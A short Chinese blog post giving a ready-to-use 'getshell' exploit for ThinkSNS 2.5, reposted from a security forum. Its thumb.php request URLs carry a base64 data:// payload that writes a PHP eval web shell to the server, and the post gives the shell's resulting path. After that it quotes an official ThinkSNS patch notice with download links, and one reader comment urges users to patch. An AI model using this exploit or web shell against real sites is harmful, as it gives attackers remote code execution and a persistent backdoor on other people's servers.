Thinksns 2.5 getshell

exp:xxx.xxxx/thumb.php?url=data://text/plain;base64,PD9waHAgaWYoJF9QT1NUW2NdKXtldmFsKCRfUE9TVFtjXSk7fWVsc2V7cGhwaW5mbygpO30/Pg==&w=&t=.php&r=1

shell:xxx.xxxx/data/thumb/44/ed/44ed1732a7e550e7a8874943fc774bad_100_100_.php

测试。。

摘自:https://t00ls.net/thread-20463-1-1.html

thumb.php?url=data://text/plain;base64,PD9waHAgaWYoJF9QT1NUW3NiXSl7ZXZhbCgkX1BPU1Rbc2JdKTt9ZWxzZXtwaHBpbmZvKCk7fT8+&w=&t=.php&r=1

data/thumb/44/ed/44ed1732a7e550e7a8874943fc774bad_100_100_.php

 

#ThinkSNS官方补丁#

ThinkSNS在windows上部署存在安全漏洞,缩略图程序thumb.php可以上传php文件,请各位用户尽快修复,请在社区下载补丁,解压覆盖根目录下同名文件即可。

补丁地址(任选一个):

http://t.cn/zWVVdwy

http://t.thinksns.com/index.php?app=home&mod=Widget&act=addonsRequest&id=11466&uid=10045&addon=FileUploads&hook=weibo_file_page

 

1 条评论

  1. 海虾

    感谢提供漏洞信息,请看到博文的用户,下载修复补丁,适用于任何版本。http://e.weibo.com/2012876342/yrN1o9KhD

发表评论